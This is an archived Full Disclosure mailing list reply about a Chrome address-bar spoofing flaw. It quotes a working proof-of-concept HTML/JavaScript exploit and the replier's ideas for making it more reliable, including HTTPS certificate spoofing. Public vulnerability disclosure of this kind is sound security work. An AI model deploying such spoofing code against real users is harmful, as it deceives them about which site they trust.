[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] Google Chrome Address Spoofing (Request For Comment)

To: David Leo <david.leo@xxxxxxxxxxxx>
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
From: Mustafa Al-Bassam <mus@xxxxxxxxxxxx>
Date: Thu, 02 Jul 2015 14:33:37 +0100

That's pretty neat. Played around with this and made a few discoveries.

1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. 
POC/screenshot: https://github.com/musalbas/address-spoofing-poc

2. The page isn't responsive when using this flaw. That means you can't spoof a 
login box for example. (I tried.)

3. The success of the exploit seems to depend on if the browser can start 
loading content.html fast enough. I noticed that the exploit works 100% of the 
time when used locally. Perhaps a better version of the exploit would somehow 
preload content.html - for example by opening a window with an URL that starts 
with javascript: followed by a script to display the content? That, or perhaps 
reducing the interval time for trying to run next() after the popup is created.

I wonder if this works on any other browsers?

MustafaOn 30 Jun 2015 7:08 am, David Leo <david.leo@xxxxxxxxxxxx> wrote:
>
> Impact: 
> The "click to verify" thing is completely broken... 
> Anyone can be "BBB Accredited Business" etc. 
> You can make whitehouse.gov display "We love Islamic State" :-) 
>
> Note: 
> No user interaction on the fake page. 
>
> Code: 
> ***** index.html 
> <script> 
> function next() 
> { 
> w.location.replace('http://www.oracle.com/index.html?'+n);n++; 
> setTimeout("next();",15); 
> setTimeout("next();",25); 
> } 
> function f() 
> { 
> w=window.open("content.html","_blank","width=500 height=500"); 
> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
>  
> } 
> </script> 
> <a href="#" onclick="f()">Go</a><br> 
> ***** content.html 
> <b>This web page is NOT oracle.com</b> 
> <script>location="http://www.oracle.com/index.html";;</script> 
> ***** It's online 
> http://www.deusen.co.uk/items/gwhere.6128645971389012/ 
> (The page says "June/16/2015" - it works as we tested today) 
>
> Request For Comment: 
> We reported this to Google. 
> They reproduced, and say 
> It's DoS which doesn't matter. 
> We think it's very strange, 
> since the browser does not crash(not DoS), 
> and the threat is obvious. 
> What's your opinion? 
>
> Kind Regards, 
>
> PS 
> We love clever tricks. 
> We love this: 
> http://dieyu.org/ 
>
>
> _______________________________________________ 
> Sent through the Full Disclosure mailing list 
> https://nmap.org/mailman/listinfo/fulldisclosure 
> Web Archives & RSS: http://seclists.org/fulldisclosure/ 

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Microsoft Office - OLE Packager allows code execution in all Office versions, with macros disabled and high security templates applied
Next by Date: Re: [FD] [oss-security] Re: Google Chrome Address Spoofing (Request For Comment)
Previous by thread: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Next by thread: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Index(es):
- Date
- Thread